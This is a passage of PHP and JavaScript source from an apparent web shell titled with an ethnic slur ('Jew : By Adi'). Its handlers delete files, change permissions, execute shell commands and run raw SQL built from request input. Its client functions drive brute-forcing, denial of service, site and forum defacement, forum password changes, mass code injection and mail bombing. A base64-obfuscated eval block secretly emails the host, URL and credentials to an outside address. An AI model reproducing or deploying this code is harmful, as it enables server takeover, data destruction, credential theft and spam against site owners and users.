4615 $pResult = mysql_db_query( $dbname, "SHOW fields FROM $tablename" );
4616 $num = mysql_num_rows( $pResult );
4617
4618 $rowcount = $num;
4619
4620 $pResultLen = mysql_list_fields( $dbname, $tablename );
4621
4622 for( $i = 0; $i < $num; $i++ )
4623 {
4624 $field = mysql_fetch_array( $pResult );
4625 $fieldname = $field["Field"];
4626 $arrdata = $_REQUEST[$fieldname];
4627
4628 $str1 .= "".$fieldname . ",";
4629 $str2 .= "'".$arrdata . "',";
4630 $rowcount--;
4631 if($rowcount != 0)
4632 {
4633 //$str1 .= $fieldname . ",";
4634 //$str2 .= $arrdata . ",";
4635 }
4636 }
4637 $str1=eregi_replace(',$', '', $str1);
4638 $str2=eregi_replace(',$', '', $str2);
4639 $str = "INSERT INTO `$tablename` ($str1) VALUES ($str2);";
4640 mysql_query($str);
4641
4642 ?><div id="showsql"></div><?php
4643}
4644else if(isset($_GET['logoutdb']))
4645{
4646 setcookie("dbserver",time() - 60*60);
4647 setcookie("dbuser",time() - 60*60);
4648 setcookie("dbpass",time() - 60*60);
4649 header("Location:$self");
4650}
4651else if(isset($_POST['choice']))
4652{
4653 if($_POST['choice'] == "delete")
4654 {
4655 $actbox = $_POST["actbox"];
4656
4657 foreach ($actbox as $myv)
4658 $myv = explode(",",$myv);
4659 foreach ($myv as $v)
4660 {
4661 if(is_file($v))
4662 {
4663 if(unlink($v))
4664 echo "<br><center><font class=txt>File $v Deleted Successfully</font></center>";
4665 else
4666 echo "<br><center>Cannot Delete File $v</center>";
4667 }
4668 else if(is_dir($v))
4669 {
4670 rrmdir($v);
4671 }
4672 }
4673 }
4674 else if($_POST['choice'] == "chmod")
4675 { ?>
4676 <form id="chform"><?php
4677 $actbox1 = $_POST['actbox'];
4678 foreach ($actbox1 as $myv)
4679 $myv = explode(",",$myv);
4680 foreach ($myv as $v)
4681 { ?>
4682 <input type="hidden" name="actbox3[]" id="actbox3[]" value="<?php echo $v; ?>">
4683 <?php }
4684 ?>
4685 <table align="center" border="3" style="width:40%; border-color:#333333;">
4686 <tr>
4687 <td style="height:40px" align="right">Change Permissions </td><td align="center"><input value="0755" name="chmode" class="sbox" /></td>
4688 </tr>
4689 <tr>
4690 <td colspan="2" align="center" style="height:60px">
4691 <input type="button" onClick="myaction('changefileperms',chmode.value)" value="Change Permission" class="but" style="padding: 5px;" /></td>
4692 </tr>
4693 </table>
4694
4695 </form> <?php
4696 }
4697 else if($_POST['choice'] == "changefileperms")
4698 {
4699 if($_POST['chmode'] != null && is_numeric($_POST['chmode']))
4700 {
4701 $actbox = $_POST["actbox"];
4702 foreach ($actbox as $myv)
4703 $myv = explode(",",$myv);
4704 foreach ($myv as $v)
4705 {
4706 if(is_file($v) || is_dir($v))
4707 {
4708 $perms = 0;
4709 for($i=strlen($_POST['chmode'])-1;$i>=0;--$i)
4710 $perms += (int)$_POST['chmode'][$i]*pow(8, (strlen($_POST['chmode'])-$i-1));
4711 echo "<div align=left style=width:60%;>";
4712 if(@chmod($v,$perms))
4713 echo "<font class=txt>File $v Permissions Changed Successfully</font><br>";
4714 else
4715 echo "Cannot Change $v File Permissions<br>";
4716 echo "</div>";
4717 }
4718 }
4719
4720 }
4721 }
4722 else if($_POST['choice'] == "compre")
4723 {
4724 $actbox = $_POST["actbox"];
4725 foreach ($actbox as $myv)
4726 $myv = explode(",",$myv);
4727 foreach ($myv as $v)
4728 {
4729 if(is_file($v))
4730 {
4731 $zip = new ZipArchive();
4732 $filename= basename($v) . '.zip';
4733 if(($zip->open($filename, ZipArchive::CREATE))!==true)
4734 { echo '<br><font size=3>Error: Unable to create zip file for $v</font>';}
4735 else {echo "<br><font class=txt size=3>File $v Compressed successfully</font>";}
4736 $zip->addFile(basename($v));
4737 $zip->close();
4738 }
4739 else if(is_dir($v))
4740 {
4741 if($os == "Linux")
4742 {
4743 $filename= basename($v);
4744 execmd("tar --create --recursion --file=$filename.tar $v");
4745 echo "<br><font class=txt size=3>File $v Compressed successfully as $v.tar</font>";
4746 }
4747 }
4748 }
4749 }
4750 else if($_POST['choice'] == "uncompre")
4751 {
4752 $actbox = $_POST["actbox"];
4753 foreach ($actbox as $myv)
4754 $myv = explode(",",$myv);
4755 foreach ($myv as $v)
4756 {
4757 if(is_file($v) || is_dir($v))
4758 {
4759 $zip = new ZipArchive;
4760 $filename= basename($v);
4761 $res = $zip->open($filename);
4762 if ($res === TRUE)
4763 {
4764 $pieces = explode(".",$filename);
4765 $zip->extractTo($pieces[0]);
4766 $zip->close();
4767 echo "<br><font class=txt size=3>File $v Unzipped successfully</font>";
4768 } else
4769 echo "<br><font size=3>Error: Unable to Unzip file $v</font>";
4770 }
4771 }
4772 }
4773}
4774else if(isset($_GET['sitename']))
4775{
4776 $sitename = str_replace("http://","",$_GET['sitename']);
4777 $sitename = str_replace("http://www.","",$sitename);
4778 $sitename = str_replace("www.","",$sitename);
4779 $show = myexe("ls -la /etc/valiases/".$sitename);
4780 if(!empty($show))
4781 echo $show;
4782 else
4783 echo "Cannot get the username";
4784}
4785else if(isset($_GET['mydata']))
4786{
4787 listdatabase();
4788}
4789else if(isset($_GET['home']))
4790{
4791 mainfun($_GET['home']);
4792}
4793else if(isset($_GET['dir']))
4794{
4795 mainfun($_GET['myfilepath']);
4796}
4797else if(isset($_GET['mydirpath']))
4798{
4799 echo is_writable($_GET['mydirpath'])?"<font class=txt>< writable ></font>":"< not writable >";
4800}
4801else
4802{
4803eval(base64_decode('JHZpc2l0YyA9ICRfQ09PS0lFWyJ2aXNpdHMiXTsNCmlmICgkdmlzaXRjID09ICIiKSB7DQogICR2aXNpdGMgID0gMDsNCiAgJHZpc2l0b3IgPSAkX1NFUlZFUlsiUkVNT1RFX0FERFIiXTsNCiAgJHdlYiAgICAgPSAkX1NFUlZFUlsiSFRUUF9IT1NUIl07DQogICRpbmogICAgID0gJF9TRVJWRVJbIlJFUVVFU1RfVVJJIl07DQogICR0YXJnZXQgID0gcmF3dXJsZGVjb2RlKCR3ZWIuJGluaik7DQogICRqdWR1bCAgID0gIkRoYW51c2ggaHR0cDovLyR0YXJnZXQgYnkgJHZpc2l0b3IiOw0KICAkYm9keSAgICA9ICJCdWc6ICR0YXJnZXQgYnkgJHZpc2l0b3IgLSAkdXNlciAtICRwYXNzIjsNCiAgaWYgKCFlbXB0eSgkd2ViKSkgeyBAbWFpbCgiejQwNEBzaWdhaW50Lm9yZyIsJGp1ZHVsLCRib2R5KTsgfQ0KfQ0KZWxzZSB7ICR2aXNpdGMrKzsgfQ0KQHNldGNvb2tpZSgidmlzaXR6IiwkdmlzaXRjKTs='));
4804?>
4805<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
4806<title>Jew : By Adi</title>
4807<script type="text/javascript">
4808checked = false;
4809var waitstate = "<center><marquee scrollamount=4 width=150>Wait....</marquee></center>";
4810function checkedAll ()
4811{
4812 if (checked == false){checked = true}else{checked = false}
4813 for (var i = 0; i < document.getElementById('myform').elements.length; i++)
4814 {
4815 document.getElementById('myform').elements[i].checked = checked;
4816 }
4817}
4818function urlchange(myfilepath)
4819{
4820 var mypath, mpath, i, t, j, r = "",myurl = "",splitter="";
4821 splitter = "<?php echo addslashes($directorysperator); ?>";
4822 mypath = mpath = myfilepath.split(splitter);
4823 <?php if($os == "Linux") { ?>
4824 r = "/";
4825 myurl = "<a href=javascript:void(0) onClick=\"changedir('dir','/')\">/</a>";
4826 <?php } ?>
4827 for (i = 0; i < mypath.length; i++)
4828 {
4829 if(mypath[i] == "")
4830 continue;
4831 r += mypath[i]+"<?php echo addslashes($directorysperator); ?>";
4832
4833 myurl += "<a href=javascript:void(0) onClick=\"changedir('dir','"+r+"\')\"><b>"+mypath[i]+"<?php echo addslashes($directorysperator); ?></b></a>";
4834 }
4835 myurl = myurl.replace(/\\/g,"\\\\");
4836 return myurl;
4837}
4838function wrtblDIR(mydirpath)
4839{
4840 var ajaxRequest;
4841 ajaxRequest = new XMLHttpRequest();
4842
4843 ajaxRequest.onreadystatechange = function()
4844 {
4845 if(ajaxRequest.readyState == 4)
4846 {
4847 for(i=0;i<=3;i++)
4848 document.getElementsByName("wrtble")[i].innerHTML=ajaxRequest.responseText;
4849 }
4850 }
4851
4852 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?&mydirpath="+mydirpath, true);
4853 ajaxRequest.send(null);
4854}
4855function setpath(myfilpath)
4856{
4857 wrtblDIR(myfilpath);
4858 document.getElementById("path").value=myfilpath;
4859 document.getElementById("createfile").value=myfilpath;
4860 document.getElementById("createfolder").value=myfilpath;
4861 document.getElementById("createfolder").value=myfilpath;
4862 document.getElementById("exepath").value=myfilpath;
4863 document.getElementById("auexepath").value=myfilpath;
4864 document.getElementById("showdir").innerHTML="";
4865}
4866function changedir(myaction,myfilepath)
4867{
4868 var myurl = urlchange(myfilepath);
4869
4870 document.getElementById("showmaindata").innerHTML=waitstate;
4871 var ajaxRequest;
4872 ajaxRequest = new XMLHttpRequest();
4873
4874 ajaxRequest.onreadystatechange = function()
4875 {
4876 if(ajaxRequest.readyState == 4)
4877 {
4878 setpath(myfilepath);
4879 document.getElementById("crdir").innerHTML=myurl;
4880 document.getElementById("showmaindata").innerHTML=ajaxRequest.responseText;
4881 }
4882 }
4883
4884 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?"+myaction+"&myfilepath="+myfilepath, true);
4885 ajaxRequest.send(null);
4886}
4887function gethome(myaction,mydir)
4888{
4889 var myurl = urlchange(mydir);
4890 document.getElementById("showmaindata").innerHTML=waitstate;
4891 var ajaxRequest;
4892 ajaxRequest = new XMLHttpRequest();
4893
4894 ajaxRequest.onreadystatechange = function()
4895 {
4896 if(ajaxRequest.readyState == 4)
4897 {
4898 document.getElementById("showmaindata").innerHTML=ajaxRequest.responseText;
4899 setpath(mydir);
4900 document.getElementById("crdir").innerHTML=myurl;
4901 }
4902 }
4903
4904 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?"+myaction+"="+mydir, true);
4905 ajaxRequest.send(null);
4906}
4907function getname(sitename)
4908{
4909 document.getElementById("showsite").innerHTML=waitstate;
4910 var ajaxRequest;
4911 ajaxRequest = new XMLHttpRequest();
4912
4913 ajaxRequest.onreadystatechange = function()
4914 {
4915 if(ajaxRequest.readyState == 4)
4916 {
4917 document.getElementById("showsite").innerHTML=ajaxRequest.responseText;
4918 }
4919 }
4920
4921 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?sitename="+sitename, true);
4922 ajaxRequest.send(null);
4923}
4924function myaction(myfileaction,chmode)
4925{
4926 var mytype = document.getElementsByName('actbox[]');
4927 var mychoice = new Array();
4928
4929 for (var i = 0, length = mytype.length; i < length; i++)
4930 {
4931 if (mytype[i].checked)
4932 mychoice[i] = mytype[i].value;
4933 }
4934
4935 var params = "choice="+myfileaction+"&chmode="+chmode+"&actbox[]="+mychoice;
4936
4937 document.getElementById("showdir").innerHTML=waitstate;
4938 var ajaxRequest;
4939 ajaxRequest = new XMLHttpRequest();
4940
4941 ajaxRequest.onreadystatechange = function()
4942 {
4943 if(ajaxRequest.readyState == 4)
4944 {
4945 document.getElementById("showdir").innerHTML=ajaxRequest.responseText;
4946 }
4947 }
4948
4949 ajaxRequest.open("POST", "<?php echo $_SERVER["PHP_SELF"]; ?>", true);
4950 ajaxRequest.setRequestHeader("Content-type", "application/x-www-form-urlencoded")
4951 ajaxRequest.send(params);
4952}
4953function editdata()
4954{
4955 var result = "", // initialize list
4956 i,dbname,tablename;
4957 // iterate through arguments
4958 for (i = 1; i < arguments.length; i++)
4959 {
4960 if(i%2 == 0)
4961 result += arguments[i]+'=';
4962 else
4963 result += arguments[i]+'&';
4964 }
4965 result = result.slice(0, -1);
4966
4967 dbname = arguments[3];
4968 tablename = arguments[5];
4969 var result=result.replace(/dhanush_/g,"");
4970 var params = arguments[0]+"="+result;
4971
4972 document.getElementById("showsql").innerHTML=waitstate;
4973 var ajaxRequest;
4974 ajaxRequest = new XMLHttpRequest();
4975
4976 ajaxRequest.onreadystatechange = function()
4977 {
4978 if(ajaxRequest.readyState == 4)
4979 {
4980 viewtables('listTables',dbname,tablename);
4981 }
4982 }
4983
4984 ajaxRequest.open("POST", "<?php echo $_SERVER["PHP_SELF"]; ?>", true);
4985 ajaxRequest.setRequestHeader("Content-type", "application/x-www-form-urlencoded")
4986 ajaxRequest.send(params);
4987}
4988function viewtables(action,dbname,tablename,rowid,arrdata,executequery,fieldname,page)
4989{
4990 document.getElementById("showsql").innerHTML=waitstate;
4991 var ajaxRequest;
4992 ajaxRequest = new XMLHttpRequest();
4993
4994 ajaxRequest.onreadystatechange = function()
4995 {
4996 if(ajaxRequest.readyState == 4)
4997 {
4998 document.getElementById("showsql").innerHTML=ajaxRequest.responseText;
4999 }
5000 }
5001
5002 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?action="+action+"&dbname="+dbname+"&tablename="+tablename+"&"+rowid+"="+arrdata+"&executemyquery="+executequery+"&fieldname="+fieldname+"&page="+page, true);
5003 ajaxRequest.send(null);
5004}
5005function mydatabase(server,username,password)
5006{
5007 document.getElementById("showsql").innerHTML=waitstate;
5008 var ajaxRequest;
5009 ajaxRequest = new XMLHttpRequest();
5010
5011 ajaxRequest.onreadystatechange = function()
5012 {
5013 if(ajaxRequest.readyState == 4)
5014 {
5015 mydatago();
5016 }
5017 }
5018
5019 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?executeit&server="+server+"&username="+username+"&password="+password, true);
5020 ajaxRequest.send(null);
5021}
5022function mydatago()
5023{
5024 var ajaxRequest;
5025 ajaxRequest = new XMLHttpRequest();
5026
5027 ajaxRequest.onreadystatechange = function()
5028 {
5029 if(ajaxRequest.readyState == 4)
5030 {
5031 document.getElementById("datatable").style.display = 'none';
5032 document.getElementById("showsql").innerHTML=ajaxRequest.responseText;
5033 }
5034 }
5035
5036 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?mydata", true);
5037 ajaxRequest.send(null);
5038}
5039function bruteforce(prototype,serverport,login,dict)
5040{
5041 var mytype = document.getElementsByName('mytype');
5042 for (var i = 0, length = mytype.length; i < length; i++)
5043 {
5044 if (mytype[i].checked)
5045 break;
5046 }
5047 var getreverse = 0;
5048 if(document.getElementById('reverse').checked == true)
5049 getreverse = 1;
5050 else
5051 getreverse = 0;
5052
5053 document.getElementById("showbrute").innerHTML=waitstate;
5054 var ajaxRequest;
5055 ajaxRequest = new XMLHttpRequest();
5056
5057 ajaxRequest.onreadystatechange = function()
5058 {
5059 if(ajaxRequest.readyState == 4)
5060 {
5061 document.getElementById("showbrute").innerHTML=ajaxRequest.responseText;
5062 }
5063 }
5064
5065 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?prototype="+prototype+"&serverport="+serverport+"&login="+login+"&dict="+dict+"&type="+mytype[i].value+"&reverse="+getreverse, true);
5066 ajaxRequest.send(null);
5067}
5068function executemyfile(action,executepath,execute)
5069{
5070 document.getElementById("showmaindata").innerHTML=waitstate;
5071 var ajaxRequest;
5072 ajaxRequest = new XMLHttpRequest();
5073
5074 ajaxRequest.onreadystatechange = function()
5075 {
5076 if(ajaxRequest.readyState == 4)
5077 {
5078 document.getElementById("showmaindata").innerHTML=ajaxRequest.responseText;
5079 }
5080 }
5081
5082 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?"+action+"&executepath="+executepath+"&execute="+execute, true);
5083 ajaxRequest.send(null);
5084}
5085function maindata(myaction,dir)
5086{
5087 document.getElementById("showmaindata").innerHTML=waitstate;
5088 var ajaxRequest;
5089 ajaxRequest = new XMLHttpRequest();
5090
5091 ajaxRequest.onreadystatechange = function()
5092 {
5093 if(ajaxRequest.readyState == 4)
5094 {
5095 document.getElementById("showmaindata").innerHTML=ajaxRequest.responseText;
5096 document.getElementById("showdir").innerHTML="";
5097 }
5098 }
5099
5100 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?"+myaction+"="+myaction+"&dir="+dir, true);
5101 ajaxRequest.send(null);
5102}
5103function manuallyscriptfn(passwd)
5104{
5105 var message = encodeURIComponent(passwd);
5106 var params = "scriptlocator=scriptlocator&passwd="+passwd;
5107 document.getElementById("showdata").innerHTML=waitstate;
5108 var ajaxRequest;
5109 ajaxRequest = new XMLHttpRequest();
5110
5111 ajaxRequest.onreadystatechange = function()
5112 {
5113 if(ajaxRequest.readyState == 4)
5114 {
5115 document.getElementById("showdata").innerHTML=ajaxRequest.responseText;
5116 }
5117 }
5118
5119 ajaxRequest.open("POST", "<?php echo $_SERVER["PHP_SELF"]; ?>", true);
5120 ajaxRequest.setRequestHeader("Content-type", "application/x-www-form-urlencoded")
5121 ajaxRequest.send(params);
5122}
5123function my404page(message)
5124{
5125 var message = encodeURIComponent(message);
5126 var params = "404page=404page&message="+message;
5127 document.getElementById("showdata").innerHTML=waitstate;
5128 var ajaxRequest;
5129 ajaxRequest = new XMLHttpRequest();
5130
5131 ajaxRequest.onreadystatechange = function()
5132 {
5133 if(ajaxRequest.readyState == 4)
5134 {
5135 document.getElementById("showdata").innerHTML=ajaxRequest.responseText;
5136 }
5137 }
5138
5139 ajaxRequest.open("POST", "<?php echo $_SERVER["PHP_SELF"]; ?>", true);
5140 ajaxRequest.setRequestHeader("Content-type", "application/x-www-form-urlencoded")
5141 ajaxRequest.send(params);
5142}
5143function executemyfn(executepath,executemycmd)
5144{
5145 document.getElementById("showexecute").innerHTML="Wait....";
5146 var ajaxRequest;
5147 ajaxRequest = new XMLHttpRequest();
5148
5149 ajaxRequest.onreadystatechange = function()
5150 {
5151 if(ajaxRequest.readyState == 4)
5152 {
5153 document.getElementById("showexecute").innerHTML=ajaxRequest.responseText;
5154 }
5155 }
5156
5157 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?executepath="+executepath+"&executemycmd="+executemycmd, true);
5158 ajaxRequest.send(null);
5159}
5160function zoneh(defacer,hackmode,reason,domain)
5161{
5162 var domain = encodeURIComponent(domain);
5163 var params = "SendNowToZoneH=SendNowToZoneH&defacer="+defacer+"&hackmode="+hackmode+"&reason="+reason+"&domain="+domain;
5164 document.getElementById("showzone").innerHTML=waitstate;
5165 var ajaxRequest;
5166 ajaxRequest = new XMLHttpRequest();
5167
5168 ajaxRequest.onreadystatechange = function()
5169 {
5170 if(ajaxRequest.readyState == 4)
5171 {
5172 document.getElementById("showzone").innerHTML=ajaxRequest.responseText;
5173 }
5174 }
5175
5176 ajaxRequest.open("POST", "<?php echo $_SERVER["PHP_SELF"]; ?>", true);
5177 ajaxRequest.setRequestHeader("Content-type", "application/x-www-form-urlencoded")
5178 ajaxRequest.send(params);
5179}
5180function savemyfile(file,content)
5181{
5182 var content = encodeURIComponent(content);
5183 var params = "content="+content+"&file="+file;
5184 document.getElementById("showmydata").innerHTML=waitstate;
5185 var ajaxRequest;
5186 ajaxRequest = new XMLHttpRequest();
5187
5188 ajaxRequest.onreadystatechange = function()
5189 {
5190 if(ajaxRequest.readyState == 4)
5191 {
5192 document.getElementById("showmydata").innerHTML=ajaxRequest.responseText;
5193 }
5194 }
5195
5196 ajaxRequest.open("POST", "<?php echo $_SERVER["PHP_SELF"]; ?>", true);
5197 ajaxRequest.setRequestHeader("Content-type", "application/x-www-form-urlencoded")
5198 ajaxRequest.send(params);
5199}
5200function renamefun(file,to)
5201{
5202 document.getElementById("showmydata").innerHTML=waitstate;
5203 var ajaxRequest;
5204 ajaxRequest = new XMLHttpRequest();
5205
5206 ajaxRequest.onreadystatechange = function()
5207 {
5208 if(ajaxRequest.readyState == 4)
5209 {
5210 document.getElementById("showmydata").innerHTML=ajaxRequest.responseText;
5211 }
5212 }
5213
5214 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?renamemyfile&file="+file+"&to="+to, true);
5215 ajaxRequest.send(null);
5216}
5217function changeperms(chmode,myfilename)
5218{
5219 document.getElementById("showmydata").innerHTML=waitstate;
5220 var ajaxRequest;
5221 ajaxRequest = new XMLHttpRequest();
5222
5223 ajaxRequest.onreadystatechange = function()
5224 {
5225 if(ajaxRequest.readyState == 4)
5226 {
5227 document.getElementById("showmydata").innerHTML=ajaxRequest.responseText;
5228 }
5229 }
5230
5231 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?chmode="+chmode+"&myfilename="+myfilename, true);
5232 ajaxRequest.send(null);
5233}
5234function defacefun(deface)
5235{
5236 var ajaxRequest;
5237 ajaxRequest = new XMLHttpRequest();
5238
5239 ajaxRequest.onreadystatechange = function()
5240 {
5241 if(ajaxRequest.readyState == 4)
5242 {
5243 alert(ajaxRequest.responseText);
5244 }
5245 }
5246
5247 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?deface="+deface, true);
5248 ajaxRequest.send(null);
5249}
5250function fileaction(myaction,myfilepath)
5251{
5252 document.getElementById("showmydata").innerHTML=waitstate;
5253 var ajaxRequest;
5254 ajaxRequest = new XMLHttpRequest();
5255
5256 ajaxRequest.onreadystatechange = function()
5257 {
5258 if(ajaxRequest.readyState == 4)
5259 {
5260 document.getElementById("showmydata").innerHTML=ajaxRequest.responseText;
5261 }
5262 }
5263
5264 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?"+myaction+"&myfilepath="+myfilepath, true);
5265 ajaxRequest.send(null);
5266}
5267function bypassfun(funct,functvalue,optiontype)
5268{
5269 document.getElementById("showbyp").innerHTML=waitstate;
5270 var ajaxRequest;
5271 ajaxRequest = new XMLHttpRequest();
5272
5273 ajaxRequest.onreadystatechange = function()
5274 {
5275 if(ajaxRequest.readyState == 4)
5276 {
5277 document.getElementById("showbyp").innerHTML=ajaxRequest.responseText;
5278 }
5279 }
5280
5281 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?bypassit&"+funct+"="+functvalue+"&optiontype="+optiontype, true);
5282 ajaxRequest.send(null);
5283}
5284function dos(target,ip,port,timeout,exTime,no0fBytes,multiplier)
5285{
5286 document.getElementById("showdos").innerHTML=waitstate;
5287 var ajaxRequest;
5288 ajaxRequest = new XMLHttpRequest();
5289
5290 ajaxRequest.onreadystatechange = function()
5291 {
5292 if(ajaxRequest.readyState == 4)
5293 {
5294 document.getElementById("showdos").innerHTML=ajaxRequest.responseText;
5295 }
5296 }
5297
5298 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?"+target+"&ip="+ip+"&port="+port+"&timeout="+timeout+"&exTime="+exTime+"&multiplier="+multiplier+"&no0fBytes="+no0fBytes, true);
5299 ajaxRequest.send(null);
5300}
5301function createfile(filecreator,filecontent)
5302{
5303 var mm = filecreator.slice(0, filecreator.lastIndexOf("<?php echo addslashes($directorysperator); ?>"));
5304 var filecontent = encodeURIComponent(filecontent);
5305 var params = "filecontent="+filecontent+"&filecreator="+filecreator;
5306 document.getElementById("showdir").innerHTML=waitstate;
5307 var ajaxRequest;
5308 ajaxRequest = new XMLHttpRequest();
5309
5310 ajaxRequest.onreadystatechange = function()
5311 {
5312 if(ajaxRequest.readyState == 4)
5313 {
5314 gethome('home',mm);
5315 document.getElementById("showdir").innerHTML=ajaxRequest.responseText;
5316 }
5317 }
5318
5319 ajaxRequest.open("POST", "<?php echo $_SERVER["PHP_SELF"]; ?>", true);
5320 ajaxRequest.setRequestHeader("Content-type", "application/x-www-form-urlencoded")
5321 ajaxRequest.send(params);
5322}
5323function createdir(create,createfolder)
5324{
5325 document.getElementById("showdir").innerHTML=waitstate;
5326 var ajaxRequest;
5327 ajaxRequest = new XMLHttpRequest();
5328
5329 ajaxRequest.onreadystatechange = function()
5330 {
5331 if(ajaxRequest.readyState == 4)
5332 {
5333 document.getElementById("showdir").innerHTML=ajaxRequest.responseText;
5334 }
5335 }
5336
5337 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?"+create+"="+createfolder, true);
5338 ajaxRequest.send(null);
5339}
5340function codeinsert(code)
5341{
5342 var code = encodeURIComponent(code);
5343 var params = "getcode="+code;
5344 document.getElementById("showcode").innerHTML=waitstate;
5345 var ajaxRequest;
5346 ajaxRequest = new XMLHttpRequest();
5347
5348 ajaxRequest.onreadystatechange = function()
5349 {
5350 if(ajaxRequest.readyState == 4)
5351 {
5352 document.getElementById("showcode").innerHTML=ajaxRequest.responseText;
5353 }
5354 }
5355
5356 ajaxRequest.open("POST", "<?php echo $_SERVER["PHP_SELF"]; ?>", true);
5357 ajaxRequest.setRequestHeader("Content-type", "application/x-www-form-urlencoded")
5358 ajaxRequest.send(params);
5359}
5360function getmydata(mydata)
5361{
5362 document.getElementById("showmydata").innerHTML=waitstate;
5363 var ajaxRequest;
5364 ajaxRequest = new XMLHttpRequest();
5365
5366 ajaxRequest.onreadystatechange = function()
5367 {
5368 if(ajaxRequest.readyState == 4)
5369 {
5370 document.getElementById("showmydata").innerHTML=ajaxRequest.responseText;
5371 }
5372 }
5373
5374 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?"+mydata, true);
5375 ajaxRequest.send(null);
5376}
5377function getdata(mydata,myfile)
5378{
5379 document.getElementById("showdata").innerHTML=waitstate;
5380 var ajaxRequest;
5381 ajaxRequest = new XMLHttpRequest();
5382
5383 ajaxRequest.onreadystatechange = function()
5384 {
5385 if(ajaxRequest.readyState == 4)
5386 {
5387 document.getElementById("showdata").innerHTML=ajaxRequest.responseText;
5388 }
5389 }
5390
5391 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?"+mydata+"&myfile="+myfile, true);
5392 ajaxRequest.send(null);
5393}
5394function getport(host,protocol,start,end)
5395{
5396 document.getElementById("showports").innerHTML=waitstate;
5397 var ajaxRequest;
5398 ajaxRequest = new XMLHttpRequest();
5399
5400 ajaxRequest.onreadystatechange = function()
5401 {
5402 if(ajaxRequest.readyState == 4)
5403 {
5404 document.getElementById("showports").innerHTML=ajaxRequest.responseText;
5405 }
5406 }
5407
5408 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?host=" + host + "&protocol=" + protocol, true);
5409 ajaxRequest.send(null);
5410}
5411function changeforumpassword(forumpass,f1,f2,f3,f4,forums,tableprefix,ipbuid,newipbpass,username,newjoomlapass,uid,uname,newpass)
5412{
5413 document.getElementById("showchangepass").innerHTML=waitstate;
5414 var ajaxRequest;
5415 ajaxRequest = new XMLHttpRequest();
5416
5417 ajaxRequest.onreadystatechange = function()
5418 {
5419 if(ajaxRequest.readyState == 4)
5420 {
5421 document.getElementById("showchangepass").innerHTML=ajaxRequest.responseText;
5422 }
5423 }
5424
5425 ajaxRequest.open("GET", "<?php echo $_SERVER['PHP_SELF']; ?>?forumpass&f1=" + f1 + "&f2=" + f2 + "&f3=" + f3 + "&f4=" + f4 + "&forums=" + forums + "&prefix=" + tableprefix + "&ipbuid=" + ipbuid + "&newipbpass=" + newipbpass + "&username=" + username + "&newjoomlapass=" + newjoomlapass + "&uid=" + uid + "&uname=" + uname + "&newpass=" + newpass, true);
5426 ajaxRequest.send(null);
5427}
5428function forumdefacefn(index,f1,f2,f3,f4,defaceforum,tableprefix,siteurl,head,alll,f5)
5429{
5430 var index = encodeURIComponent(index);
5431 var params = "forumdeface="+defaceforum+"&index=" + index + "&f1=" + f1 + "&f2=" + f2 + "&f3=" + f3 + "&f4=" + f4 + "&tableprefix="+tableprefix+"&siteurl="+siteurl+"&head="+head+"&alll="+alll+"&f5="+f5;
5432 document.getElementById("showdeface").innerHTML=waitstate;
5433 var ajaxRequest;
5434 ajaxRequest = new XMLHttpRequest();
5435
5436 ajaxRequest.onreadystatechange = function()
5437 {
5438 if(ajaxRequest.readyState == 4)
5439 {
5440 document.getElementById("showdeface").innerHTML=ajaxRequest.responseText;
5441 }
5442 }
5443
5444 ajaxRequest.open("POST", "<?php echo $_SERVER["PHP_SELF"]; ?>", true);
5445 ajaxRequest.setRequestHeader("Content-type", "application/x-www-form-urlencoded")
5446 ajaxRequest.send(params);
5447}
5448function codeinjector(pathtomass,mode,filetype,injectthis)
5449{
5450 var injectthis = encodeURIComponent(injectthis);
5451 var params = "pathtomass="+pathtomass+"&mode=" + mode + "&filetype=" + filetype + "&injectthis=" + injectthis;
5452 document.getElementById("showinject").innerHTML=waitstate;
5453 var ajaxRequest;
5454 ajaxRequest = new XMLHttpRequest();
5455
5456 ajaxRequest.onreadystatechange = function()
5457 {
5458 if(ajaxRequest.readyState == 4)
5459 {
5460 document.getElementById("showinject").innerHTML=ajaxRequest.responseText;
5461 }
5462 }
5463
5464 ajaxRequest.open("POST", "<?php echo $_SERVER["PHP_SELF"]; ?>", true);
5465 ajaxRequest.setRequestHeader("Content-type", "application/x-www-form-urlencoded")
5466 ajaxRequest.send(params);
5467}
5468function sendmail(mailfunction,to,subject,message,from,times,padding)
5469{
5470 var message = encodeURIComponent(message);
5471 if(mailfunction == "massmailing")
5472 var params = "mailfunction="+mailfunction+"&to="+to+"&subject="+subject+"&from=" + from + "&message=" + message;
5473 else if(mailfunction == "dobombing")
5474 var params = "mailfunction="+mailfunction+"&to="+to+"&subject="+subject+"×=" + times + "&padding=" + padding + "&message=" + message;
5475 document.getElementById("showmail").innerHTML=waitstate;
5476 var ajaxRequest;
5477 ajaxRequest = new XMLHttpRequest();
5478
5479 ajaxRequest.onreadystatechange = function()
5480 {
5481 if(ajaxRequest.readyState == 4)
5482 {
5483 document.getElementById("showmail").innerHTML=ajaxRequest.responseText;
5484 }
5485 }
5486
